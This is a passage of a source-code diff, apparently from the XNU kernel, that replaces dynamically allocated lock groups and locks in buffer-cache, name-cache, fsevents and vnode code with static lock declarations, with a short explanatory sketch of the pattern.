-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                bp = getnewbuf(0, 0, &queue);
        } while (bp == NULL);
@@ -3406,7 +3390,7 @@ buf_geteblk(int size)
        binshash(bp, &invalhash);
        bufstats.bufs_eblk++;
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        allocbuf(bp, size);
 
@@ -3439,7 +3423,7 @@ recycle_buf_from_pool(int nsize)
        buf_t   bp;
        void    *ptr = NULL;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        TAILQ_FOREACH(bp, &bufqueues[BQ_META], b_freelist) {
                if (ISSET(bp->b_flags, B_DELWRI) || bp->b_bufsize != (uint32_t)nsize) {
@@ -3451,7 +3435,7 @@ recycle_buf_from_pool(int nsize)
                bcleanbuf(bp, TRUE);
                break;
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return ptr;
 }
@@ -3607,9 +3591,9 @@ allocbuf(buf_t bp, int size)
  *     Remove the buffer from the hash. Return the buffer and the queue
  *     on which it was found.
  *
- *     buf_mtxp is held upon entry
- *     returns with buf_mtxp locked if new buf available
- *     returns with buf_mtxp UNlocked if new buf NOT available
+ *     buf_mtx is held upon entry
+ *     returns with buf_mtx locked if new buf available
+ *     returns with buf_mtx UNlocked if new buf NOT available
  */
 
 static buf_t
@@ -3677,7 +3661,7 @@ start:
                 */
 
 add_newbufs:
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                /* Create a new temporary buffer header */
                bp = (struct buf *)zalloc(buf_hdr_zone);
@@ -3690,7 +3674,7 @@ add_newbufs:
                        SET(bp->b_flags, B_HDRALLOC);
                        *queue = BQ_EMPTY;
                }
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                if (bp) {
                        binshash(bp, &invalhash);
@@ -3710,7 +3694,7 @@ add_newbufs:
                /* the hz value is 100; which leads to 10ms */
                ts.tv_nsec = (slptimeo % 1000) * NSEC_PER_USEC * 1000 * 10;
 
-               msleep(&needbuffer, buf_mtxp, slpflag | PDROP | (PRIBIO + 1), "getnewbuf", &ts);
+               msleep(&needbuffer, &buf_mtx, slpflag | PDROP | (PRIBIO + 1), "getnewbuf", &ts);
                return NULL;
        }
 
@@ -3793,8 +3777,8 @@ found:
  * Returns 1 if issued a buf_bawrite() to indicate
  * that the buffer is not ready.
  *
- * buf_mtxp is held upon entry
- * returns with buf_mtxp locked
+ * buf_mtx is held upon entry
+ * returns with buf_mtx locked
  */
 int
 bcleanbuf(buf_t bp, boolean_t discard)
@@ -3817,7 +3801,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
 
                bmovelaundry(bp);
 
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                wakeup(&bufqueues[BQ_LAUNDRY]);
                /*
@@ -3825,7 +3809,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
                 */
                (void)thread_block(THREAD_CONTINUE_NULL);
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                return 1;
        }
@@ -3848,7 +3832,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
                brelvp_locked(bp);
        }
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        BLISTNONE(bp);
 
@@ -3862,7 +3846,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
 
        /* If discarding, just move to the empty queue */
        if (discard) {
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
                CLR(bp->b_flags, (B_META | B_ZALLOC | B_DELWRI | B_LOCKED | B_AGE | B_ASYNC | B_NOCACHE | B_FUA));
                bp->b_whichq = BQ_EMPTY;
                binshash(bp, &invalhash);
@@ -3898,7 +3882,7 @@ bcleanbuf(buf_t bp, boolean_t discard)
                bp->b_validoff = bp->b_validend = 0;
                bzero(&bp->b_attr, sizeof(struct bufattr));
 
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
        }
        return 0;
 }
@@ -3915,20 +3899,20 @@ buf_invalblkno(vnode_t vp, daddr64_t lblkno, int flags)
        dp = BUFHASH(vp, lblkno);
 
 relook:
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        if ((bp = incore_locked(vp, lblkno, dp)) == (struct buf *)0) {
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
                return 0;
        }
        if (ISSET(bp->b_lflags, BL_BUSY)) {
                if (!ISSET(flags, BUF_WAIT)) {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
                        return EBUSY;
                }
                SET(bp->b_lflags, BL_WANTED);
 
-               error = msleep((caddr_t)bp, buf_mtxp, PDROP | (PRIBIO + 1), "buf_invalblkno", NULL);
+               error = msleep((caddr_t)bp, &buf_mtx, PDROP | (PRIBIO + 1), "buf_invalblkno", NULL);
 
                if (error) {
                        return error;
@@ -3943,7 +3927,7 @@ relook:
        bp->b_owner = current_thread();
        bp->b_tag   = 4;
 #endif
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
        buf_brelse(bp);
 
        return 0;
@@ -3955,12 +3939,12 @@ buf_drop(buf_t bp)
 {
        int need_wakeup = 0;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        if (ISSET(bp->b_lflags, BL_WANTED)) {
                /*
                 * delay the actual wakeup until after we
-                * clear BL_BUSY and we've dropped buf_mtxp
+                * clear BL_BUSY and we've dropped buf_mtx
                 */
                need_wakeup = 1;
        }
@@ -3974,7 +3958,7 @@ buf_drop(buf_t bp)
        CLR(bp->b_lflags, (BL_BUSY | BL_WANTED));
        buf_busycount--;
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (need_wakeup) {
                /*
@@ -3990,11 +3974,11 @@ buf_acquire(buf_t bp, int flags, int slpflag, int slptimeo)
 {
        errno_t error;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        error = buf_acquire_locked(bp, flags, slpflag, slptimeo);
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return error;
 }
@@ -4029,7 +4013,7 @@ buf_acquire_locked(buf_t bp, int flags, int slpflag, int slptimeo)
                /* the hz value is 100; which leads to 10ms */
                ts.tv_sec = (slptimeo / 100);
                ts.tv_nsec = (slptimeo % 100) * 10  * NSEC_PER_USEC * 1000;
-               error = msleep((caddr_t)bp, buf_mtxp, slpflag | (PRIBIO + 1), "buf_acquire", &ts);
+               error = msleep((caddr_t)bp, &buf_mtx, slpflag | (PRIBIO + 1), "buf_acquire", &ts);
 
                if (error) {
                        return error;
@@ -4058,14 +4042,14 @@ errno_t
 buf_biowait(buf_t bp)
 {
        while (!ISSET(bp->b_flags, B_DONE)) {
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                if (!ISSET(bp->b_flags, B_DONE)) {
                        DTRACE_IO1(wait__start, buf_t, bp);
-                       (void) msleep(bp, buf_mtxp, PDROP | (PRIBIO + 1), "buf_biowait", NULL);
+                       (void) msleep(bp, &buf_mtx, PDROP | (PRIBIO + 1), "buf_biowait", NULL);
                        DTRACE_IO1(wait__done, buf_t, bp);
                } else {
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
                }
        }
        /* check for interruption of I/O (e.g. via NFS), then errors. */
@@ -4259,12 +4243,12 @@ buf_biodone(buf_t bp)
                 * they do get to run, their going to re-set
                 * BL_WANTED and go back to sleep
                 */
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                CLR(bp->b_lflags, BL_WANTED);
                SET(bp->b_flags, B_DONE);               /* note that it's done */
 
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                wakeup(bp);
        }
@@ -4295,13 +4279,13 @@ count_lock_queue(void)
        buf_t   bp;
        int     n = 0;
 
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 
        for (bp = bufqueues[BQ_LOCKED].tqh_first; bp;
            bp = bp->b_freelist.tqe_next) {
                n++;
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        return n;
 }
@@ -4338,13 +4322,13 @@ vfs_bufstats()
                        counts[j] = 0;
                }
 
-               lck_mtx_lock(buf_mtxp);
+               lck_mtx_lock(&buf_mtx);
 
                for (bp = dp->tqh_first; bp; bp = bp->b_freelist.tqe_next) {
                        counts[bp->b_bufsize / CLBYTES]++;
                        count++;
                }
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                printf("%s: total-%d", bname[i], count);
                for (j = 0; j <= MAXBSIZE / CLBYTES; j++) {
@@ -4369,7 +4353,7 @@ alloc_io_buf(vnode_t vp, int priv)
        mount_t mp = NULL;
        int alloc_for_virtualdev = FALSE;
 
-       lck_mtx_lock_spin(iobuffer_mtxp);
+       lck_mtx_lock_spin(&iobuffer_mtxp);
 
        /*
         * We subject iobuf requests for diskimages to additional restrictions.
@@ -4388,7 +4372,7 @@ alloc_io_buf(vnode_t vp, int priv)
                        bufstats.bufs_iobufsleeps++;
 
                        need_iobuffer = 1;
-                       (void)msleep(&need_iobuffer, iobuffer_mtxp,
+                       (void)msleep(&need_iobuffer, &iobuffer_mtxp,
                            PSPIN | (PRIBIO + 1), (const char *)"alloc_io_buf (1)",
                            NULL);
                }
@@ -4399,7 +4383,7 @@ alloc_io_buf(vnode_t vp, int priv)
                bufstats.bufs_iobufsleeps++;
 
                need_iobuffer = 1;
-               (void)msleep(&need_iobuffer, iobuffer_mtxp, PSPIN | (PRIBIO + 1),
+               (void)msleep(&need_iobuffer, &iobuffer_mtxp, PSPIN | (PRIBIO + 1),
                    (const char *)"alloc_io_buf (2)", NULL);
        }
        TAILQ_REMOVE(&iobufqueue, bp, b_freelist);
@@ -4414,7 +4398,7 @@ alloc_io_buf(vnode_t vp, int priv)
                bufstats.bufs_iobufinuse_vdev++;
        }
 
-       lck_mtx_unlock(iobuffer_mtxp);
+       lck_mtx_unlock(&iobuffer_mtxp);
 
        /*
         * initialize various fields
@@ -4481,7 +4465,7 @@ free_io_buf(buf_t bp)
        /* Zero out the bufattr and its flags before relinquishing this iobuf */
        bzero(&bp->b_attr, sizeof(struct bufattr));
 
-       lck_mtx_lock_spin(iobuffer_mtxp);
+       lck_mtx_lock_spin(&iobuffer_mtxp);
 
        binsheadfree(bp, &iobufqueue, -1);
 
@@ -4511,7 +4495,7 @@ free_io_buf(buf_t bp)
                }
        }
 
-       lck_mtx_unlock(iobuffer_mtxp);
+       lck_mtx_unlock(&iobuffer_mtxp);
 
        if (need_wakeup) {
                wakeup(&need_iobuffer);
@@ -4522,13 +4506,13 @@ free_io_buf(buf_t bp)
 void
 buf_list_lock(void)
 {
-       lck_mtx_lock_spin(buf_mtxp);
+       lck_mtx_lock_spin(&buf_mtx);
 }
 
 void
 buf_list_unlock(void)
 {
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 }
 
 /*
@@ -4559,10 +4543,10 @@ bcleanbuf_thread(void)
        int loopcnt = 0;
 
        for (;;) {
-               lck_mtx_lock_spin(buf_mtxp);
+               lck_mtx_lock_spin(&buf_mtx);
 
                while ((bp = TAILQ_FIRST(&bufqueues[BQ_LAUNDRY])) == NULL) {
-                       (void)msleep0(&bufqueues[BQ_LAUNDRY], buf_mtxp, PRIBIO | PDROP, "blaundry", 0, (bcleanbufcontinuation)bcleanbuf_thread);
+                       (void)msleep0(&bufqueues[BQ_LAUNDRY], &buf_mtx, PRIBIO | PDROP, "blaundry", 0, (bcleanbufcontinuation)bcleanbuf_thread);
                }
 
                /*
@@ -4581,7 +4565,7 @@ bcleanbuf_thread(void)
                bp->b_tag   = 10;
 #endif
 
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
                /*
                 * do the IO
                 */
@@ -4591,7 +4575,7 @@ bcleanbuf_thread(void)
                        bp->b_whichq = BQ_LAUNDRY;
                        bp->b_timestamp = buf_timestamp();
 
-                       lck_mtx_lock_spin(buf_mtxp);
+                       lck_mtx_lock_spin(&buf_mtx);
 
                        binstailfree(bp, &bufqueues[BQ_LAUNDRY], BQ_LAUNDRY);
                        blaundrycnt++;
@@ -4604,7 +4588,7 @@ bcleanbuf_thread(void)
                        bp->b_tag   = 11;
 #endif
 
-                       lck_mtx_unlock(buf_mtxp);
+                       lck_mtx_unlock(&buf_mtx);
 
                        if (loopcnt > MAXLAUNDRY) {
                                /*
@@ -4686,24 +4670,24 @@ dump_buffer:
 int
 fs_buffer_cache_gc_register(void (* callout)(int, void *), void *context)
 {
-       lck_mtx_lock(buf_gc_callout);
+       lck_mtx_lock(&buf_gc_callout);
        for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) {
                if (fs_callouts[i].callout == NULL) {
                        fs_callouts[i].callout = callout;
                        fs_callouts[i].context = context;
-                       lck_mtx_unlock(buf_gc_callout);
+                       lck_mtx_unlock(&buf_gc_callout);
                        return 0;
                }
        }
 
-       lck_mtx_unlock(buf_gc_callout);
+       lck_mtx_unlock(&buf_gc_callout);
        return ENOMEM;
 }
 
 int
 fs_buffer_cache_gc_unregister(void (* callout)(int, void *), void *context)
 {
-       lck_mtx_lock(buf_gc_callout);
+       lck_mtx_lock(&buf_gc_callout);
        for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) {
                if (fs_callouts[i].callout == callout &&
                    fs_callouts[i].context == context) {
@@ -4711,20 +4695,20 @@ fs_buffer_cache_gc_unregister(void (* callout)(int, void *), void *context)
                        fs_callouts[i].context = NULL;
                }
        }
-       lck_mtx_unlock(buf_gc_callout);
+       lck_mtx_unlock(&buf_gc_callout);
        return 0;
 }
 
 static void
 fs_buffer_cache_gc_dispatch_callouts(int all)
 {
-       lck_mtx_lock(buf_gc_callout);
+       lck_mtx_lock(&buf_gc_callout);
        for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) {
                if (fs_callouts[i].callout != NULL) {
                        fs_callouts[i].callout(all, fs_callouts[i].context);
                }
        }
-       lck_mtx_unlock(buf_gc_callout);
+       lck_mtx_unlock(&buf_gc_callout);
 }
 
 static boolean_t
@@ -4747,10 +4731,10 @@ buffer_cache_gc(int all)
         * for deep sleep), we only evict up to BUF_MAX_GC_BATCH_SIZE buffers
         * that have not been accessed in the last BUF_STALE_THRESHOLD seconds.
         * BUF_MAX_GC_BATCH_SIZE controls both the hold time of the global lock
-        * "buf_mtxp" and the length of time we spend compute bound in the GC
+        * "buf_mtx" and the length of time we spend compute bound in the GC
         * thread which calls this function
         */
-       lck_mtx_lock(buf_mtxp);
+       lck_mtx_lock(&buf_mtx);
 
        do {
                found = 0;
@@ -4803,7 +4787,7 @@ buffer_cache_gc(int all)
                }
 
                /* Drop lock for batch processing */
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                /* Wakeup and yield for laundry if need be */
                if (need_wakeup) {
@@ -4832,7 +4816,7 @@ buffer_cache_gc(int all)
                        bp->b_whichq = BQ_EMPTY;
                        BLISTNONE(bp);
                }
-               lck_mtx_lock(buf_mtxp);
+               lck_mtx_lock(&buf_mtx);
 
                /* Back under lock, move them all to invalid hash and clear busy */
                TAILQ_FOREACH(bp, &privq, b_freelist) {
@@ -4853,7 +4837,7 @@ buffer_cache_gc(int all)
                TAILQ_CONCAT(&bufqueues[BQ_EMPTY], &privq, b_freelist);
        } while (all && (found == BUF_MAX_GC_BATCH_SIZE));
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        fs_buffer_cache_gc_dispatch_callouts(all);
 
@@ -4898,7 +4882,7 @@ bflushq(int whichq, mount_t mp)
        }
 
 restart:
-       lck_mtx_lock(buf_mtxp);
+       lck_mtx_lock(&buf_mtx);
 
        bp = TAILQ_FIRST(&bufqueues[whichq]);
 
@@ -4923,7 +4907,7 @@ restart:
                        total_writes++;
 
                        if (buf_count >= NFLUSH) {
-                               lck_mtx_unlock(buf_mtxp);
+                               lck_mtx_unlock(&buf_mtx);
 
                                qsort(flush_table, buf_count, sizeof(struct buf *), bp_cmp);
 
@@ -4934,7 +4918,7 @@ restart:
                        }
                }
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (buf_count > 0) {
                qsort(flush_table, buf_count, sizeof(struct buf *), bp_cmp);
index 9d4ed9a6d326a9e31282027f8fb1b35835be2db0..8f75a27361102cf240fbea8639f9a558e6ff455c 100644 (file)
@@ -145,21 +145,15 @@ struct  nchstats nchstats;              /* cache effectiveness statistics */
 
 
 /* vars for name cache list lock */
-lck_grp_t * namecache_lck_grp;
-lck_grp_attr_t * namecache_lck_grp_attr;
-lck_attr_t * namecache_lck_attr;
+static LCK_GRP_DECLARE(namecache_lck_grp, "Name Cache");
+static LCK_RW_DECLARE(namecache_rw_lock, &namecache_lck_grp);
 
-lck_grp_t * strcache_lck_grp;
-lck_grp_attr_t * strcache_lck_grp_attr;
-lck_attr_t * strcache_lck_attr;
+static LCK_GRP_DECLARE(strcache_lck_grp, "String Cache");
+static LCK_ATTR_DECLARE(strcache_lck_attr, 0, 0);
+LCK_RW_DECLARE_ATTR(strtable_rw_lock, &strcache_lck_grp, &strcache_lck_attr);
 
-lck_grp_t * rootvnode_lck_grp;
-lck_grp_attr_t * rootvnode_lck_grp_attr;
-lck_attr_t * rootvnode_lck_attr;
-
-lck_rw_t  * namecache_rw_lock;
-lck_rw_t  * strtable_rw_lock;
-lck_rw_t  * rootvnode_rw_lock;
+static LCK_GRP_DECLARE(rootvnode_lck_grp, "rootvnode");
+LCK_RW_DECLARE(rootvnode_rw_lock, &rootvnode_lck_grp);
 
 #define NUM_STRCACHE_LOCKS 1024
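The hunks above follow the conversion applied throughout this commit: lock groups, attributes and locks that used to be heap-allocated from an init routine become static LCK_GRP_DECLARE/LCK_ATTR_DECLARE/LCK_RW_DECLARE objects, and call sites now pass the embedded lock by address. A minimal before/after sketch with a hypothetical demo lock, using only calls and macros visible in this diff:

    /* old style: group, attribute and lock heap-allocated at boot */
    static lck_grp_t *demo_lck_grp_old;
    static lck_rw_t  *demo_rw_lock_old;

    static void
    demo_locks_init_old(void)
    {
            lck_grp_attr_t *grp_attr = lck_grp_attr_alloc_init();

            demo_lck_grp_old = lck_grp_alloc_init("demo", grp_attr);
            demo_rw_lock_old = lck_rw_alloc_init(demo_lck_grp_old, lck_attr_alloc_init());
    }

    /* new style: the same objects declared statically; no init routine at all */
    static LCK_GRP_DECLARE(demo_lck_grp, "demo");
    static LCK_RW_DECLARE(demo_rw_lock, &demo_lck_grp);

    static void
    demo_read_side(void)
    {
            lck_rw_lock_shared(&demo_rw_lock);      /* lock is now passed by address */
            /* ... critical section ... */
            lck_rw_done(&demo_rw_lock);
    }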
 
@@ -2400,8 +2394,6 @@ init_crc32(void)
 void
 nchinit(void)
 {
-       int     i;
-
        desiredNegNodes = (desiredvnodes / 10);
        desiredNodes = desiredvnodes + desiredNegNodes;
 
@@ -2416,61 +2408,27 @@ nchinit(void)
 
        init_string_table();
 
-       /* Allocate name cache lock group attribute and group */
-       namecache_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       namecache_lck_grp = lck_grp_alloc_init("Name Cache", namecache_lck_grp_attr);
-
-       /* Allocate name cache lock attribute */
-       namecache_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate name cache lock */
-       namecache_rw_lock = lck_rw_alloc_init(namecache_lck_grp, namecache_lck_attr);
-
-
-       /* Allocate string cache lock group attribute and group */
-       strcache_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       strcache_lck_grp = lck_grp_alloc_init("String Cache", strcache_lck_grp_attr);
-
-       /* Allocate string cache lock attribute */
-       strcache_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate string cache lock */
-       strtable_rw_lock = lck_rw_alloc_init(strcache_lck_grp, strcache_lck_attr);
-
-       for (i = 0; i < NUM_STRCACHE_LOCKS; i++) {
-               lck_mtx_init(&strcache_mtx_locks[i], strcache_lck_grp, strcache_lck_attr);
+       for (int i = 0; i < NUM_STRCACHE_LOCKS; i++) {
+               lck_mtx_init(&strcache_mtx_locks[i], &strcache_lck_grp, &strcache_lck_attr);
        }
-
-       /* Allocate root vnode lock group attribute and group */
-       rootvnode_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       rootvnode_lck_grp = lck_grp_alloc_init("rootvnode", rootvnode_lck_grp_attr);
-
-       /* Allocate rootvnode lock attribute */
-       rootvnode_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate rootvnode lock */
-       rootvnode_rw_lock = lck_rw_alloc_init(rootvnode_lck_grp, rootvnode_lck_attr);
 }
 
 void
 name_cache_lock_shared(void)
 {
-       lck_rw_lock_shared(namecache_rw_lock);
+       lck_rw_lock_shared(&namecache_rw_lock);
 }
 
 void
 name_cache_lock(void)
 {
-       lck_rw_lock_exclusive(namecache_rw_lock);
+       lck_rw_lock_exclusive(&namecache_rw_lock);
 }
 
 void
 name_cache_unlock(void)
 {
-       lck_rw_done(namecache_rw_lock);
+       lck_rw_done(&namecache_rw_lock);
 }
 
 
@@ -2718,10 +2676,10 @@ resize_string_ref_table(void)
         * the lock exclusively in case some other thread
         * beat us to the punch
         */
-       lck_rw_lock_exclusive(strtable_rw_lock);
+       lck_rw_lock_exclusive(&strtable_rw_lock);
 
        if (4 * filled_buckets < ((string_table_mask + 1) * 3)) {
-               lck_rw_done(strtable_rw_lock);
+               lck_rw_done(&strtable_rw_lock);
                return;
        }
        assert(string_table_mask < INT32_MAX);
@@ -2729,7 +2687,7 @@ resize_string_ref_table(void)
 
        if (new_table == NULL) {
                printf("failed to resize the hash table.\n");
-               lck_rw_done(strtable_rw_lock);
+               lck_rw_done(&strtable_rw_lock);
                return;
        }
 
@@ -2755,7 +2713,7 @@ resize_string_ref_table(void)
                        LIST_INSERT_HEAD(head, entry, hash_chain);
                }
        }
-       lck_rw_done(strtable_rw_lock);
+       lck_rw_done(&strtable_rw_lock);
 
        FREE(old_table, M_CACHE);
 }
@@ -2806,17 +2764,17 @@ add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_
         * if someone else decides to grow the pool they
         * will take this lock exclusively
         */
-       lck_rw_lock_shared(strtable_rw_lock);
+       lck_rw_lock_shared(&strtable_rw_lock);
 
        /*
         * If the table gets more than 3/4 full, resize it
         */
        if (4 * filled_buckets >= ((string_table_mask + 1) * 3)) {
-               lck_rw_done(strtable_rw_lock);
+               lck_rw_done(&strtable_rw_lock);
 
                resize_string_ref_table();
 
-               lck_rw_lock_shared(strtable_rw_lock);
+               lck_rw_lock_shared(&strtable_rw_lock);
        }
        hash_index = hashval & string_table_mask;
        lock_index = hash_index % NUM_STRCACHE_LOCKS;
@@ -2853,7 +2811,7 @@ add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_
        }
 
        lck_mtx_unlock(&strcache_mtx_locks[lock_index]);
-       lck_rw_done(strtable_rw_lock);
+       lck_rw_done(&strtable_rw_lock);
 
        return (const char *)entry->str;
 }
@@ -2876,7 +2834,7 @@ vfs_removename(const char *nameref)
         * if someone else decides to grow the pool they
         * will take this lock exclusively
         */
-       lck_rw_lock_shared(strtable_rw_lock);
+       lck_rw_lock_shared(&strtable_rw_lock);
        /*
         * must compute the head behind the table lock
         * since the size and location of the table
@@ -2907,7 +2865,7 @@ vfs_removename(const char *nameref)
                }
        }
        lck_mtx_unlock(&strcache_mtx_locks[lock_index]);
-       lck_rw_done(strtable_rw_lock);
+       lck_rw_done(&strtable_rw_lock);
 
        kheap_free_addr(KHEAP_DEFAULT, entry);
 
@@ -2923,7 +2881,7 @@ dump_string_table(void)
        string_t          *entry;
        u_long            i;
 
-       lck_rw_lock_shared(strtable_rw_lock);
+       lck_rw_lock_shared(&strtable_rw_lock);
 
        for (i = 0; i <= string_table_mask; i++) {
                head = &string_ref_table[i];
@@ -2931,6 +2889,6 @@ dump_string_table(void)
                        printf("%6d - %s\n", entry->refcount, entry->str);
                }
        }
-       lck_rw_done(strtable_rw_lock);
+       lck_rw_done(&strtable_rw_lock);
 }
 #endif  /* DUMP_STRING_TABLE */
index fb8e519e283afc2a0247d7c7fb2c0b5144587a96..2507a242c6b4b76c8f3cdac96a3357cdcc45fff0 100644 (file)
@@ -152,16 +152,18 @@ static void fsevents_wakeup(fs_event_watcher *watcher);
 //
 // Locks
 //
-static lck_grp_attr_t *  fsevent_group_attr;
-static lck_attr_t *      fsevent_lock_attr;
-static lck_grp_t *       fsevent_mutex_group;
+static LCK_ATTR_DECLARE(fsevent_lock_attr, 0, 0);
+static LCK_GRP_DECLARE(fsevent_mutex_group, "fsevent-mutex");
+static LCK_GRP_DECLARE(fsevent_rw_group, "fsevent-rw");
 
-static lck_grp_t *       fsevent_rw_group;
-
-static lck_rw_t  event_handling_lock; // handles locking for event manipulation and recycling
-static lck_mtx_t watch_table_lock;
-static lck_mtx_t event_buf_lock;
-static lck_mtx_t event_writer_lock;
+static LCK_RW_DECLARE_ATTR(event_handling_lock, // handles locking for event manipulation and recycling
+    &fsevent_rw_group, &fsevent_lock_attr);
+static LCK_MTX_DECLARE_ATTR(watch_table_lock,
+    &fsevent_mutex_group, &fsevent_lock_attr);
+static LCK_MTX_DECLARE_ATTR(event_buf_lock,
+    &fsevent_mutex_group, &fsevent_lock_attr);
+static LCK_MTX_DECLARE_ATTR(event_writer_lock,
+    &fsevent_mutex_group, &fsevent_lock_attr);
 
 
 /* Explicitly declare qsort so compiler doesn't complain */
@@ -204,29 +206,16 @@ fsevents_internal_init(void)
 
        memset(watcher_table, 0, sizeof(watcher_table));
 
-       fsevent_lock_attr    = lck_attr_alloc_init();
-       fsevent_group_attr   = lck_grp_attr_alloc_init();
-       fsevent_mutex_group  = lck_grp_alloc_init("fsevent-mutex", fsevent_group_attr);
-       fsevent_rw_group     = lck_grp_alloc_init("fsevent-rw", fsevent_group_attr);
-
-       lck_mtx_init(&watch_table_lock, fsevent_mutex_group, fsevent_lock_attr);
-       lck_mtx_init(&event_buf_lock, fsevent_mutex_group, fsevent_lock_attr);
-       lck_mtx_init(&event_writer_lock, fsevent_mutex_group, fsevent_lock_attr);
-
-       lck_rw_init(&event_handling_lock, fsevent_rw_group, fsevent_lock_attr);
-
        PE_get_default("kern.maxkfsevents", &max_kfs_events, sizeof(max_kfs_events));
 
        event_zone = zone_create_ext("fs-event-buf", sizeof(kfs_event),
            ZC_NOGC | ZC_NOCALLOUT, ZONE_ID_ANY, ^(zone_t z) {
                // mark the zone as exhaustible so that it will not
                // ever grow beyond what we initially filled it with
-               zone_set_exhaustible(z, max_kfs_events * sizeof(kfs_event));
+               zone_set_exhaustible(z, max_kfs_events);
        });
 
-       if (zfill(event_zone, max_kfs_events) < max_kfs_events) {
-               printf("fsevents: failed to pre-fill the event zone.\n");
-       }
+       zone_fill_initially(event_zone, max_kfs_events);
 }
 
 static void
index 4ba18afa488b8e1e62246a87382437f9a7127784..366e5170a45fe3b830f5cfd95b4a3471221b86a1 100644 (file)
@@ -111,15 +111,8 @@ fslog_extmod_msgtracer(proc_t caller, proc_t target)
  * Log information about floating point exception handling
  */
 
-static lck_mtx_t fpxlock;
-
-void
-fpxlog_init(void)
-{
-       lck_grp_attr_t *lck_grp_attr = lck_grp_attr_alloc_init();
-       lck_grp_t *lck_grp = lck_grp_alloc_init("fpx", lck_grp_attr);
-       lck_mtx_init(&fpxlock, lck_grp, LCK_ATTR_NULL);
-}
+static LCK_GRP_DECLARE(fpxlock_grp, "fpx");
+static LCK_MTX_DECLARE(fpxlock, &fpxlock_grp);
 
 struct fpx_event {
        uuid_t fe_uuid;
@@ -269,11 +262,4 @@ fpxlog(
            NULL);
 }
 
-#else
-
-void
-fpxlog_init(void)
-{
-}
-
 #endif /* __x86_64__ */
index 441d9269fea3d7344c43c97c50ca19f791aac10b..99f99e44e6886573d0de1b9c0eecdf3fc5f349eb 100644 (file)
@@ -270,53 +270,23 @@ vfs_op_init(void)
 extern struct vnodeops dead_vnodeops;
 extern struct vnodeops spec_vnodeops;
 
-/* vars for vnode lock */
-lck_grp_t * vnode_lck_grp;
-lck_grp_attr_t * vnode_lck_grp_attr;
-lck_attr_t * vnode_lck_attr;
-
-#if CONFIG_TRIGGERS
-/* vars for vnode trigger resolver */
-lck_grp_t * trigger_vnode_lck_grp;
-lck_grp_attr_t * trigger_vnode_lck_grp_attr;
-lck_attr_t * trigger_vnode_lck_attr;
-#endif
-
-lck_grp_t * fd_vn_lck_grp;
-lck_grp_attr_t * fd_vn_lck_grp_attr;
-lck_attr_t * fd_vn_lck_attr;
-
 /* vars for vnode list lock */
-lck_grp_t * vnode_list_lck_grp;
-lck_grp_attr_t * vnode_list_lck_grp_attr;
-lck_attr_t * vnode_list_lck_attr;
-lck_spin_t * vnode_list_spin_lock;
-lck_mtx_t * spechash_mtx_lock;
-
-/* vars for vfsconf lock */
-lck_grp_t * fsconf_lck_grp;
-lck_grp_attr_t * fsconf_lck_grp_attr;
-lck_attr_t * fsconf_lck_attr;
-
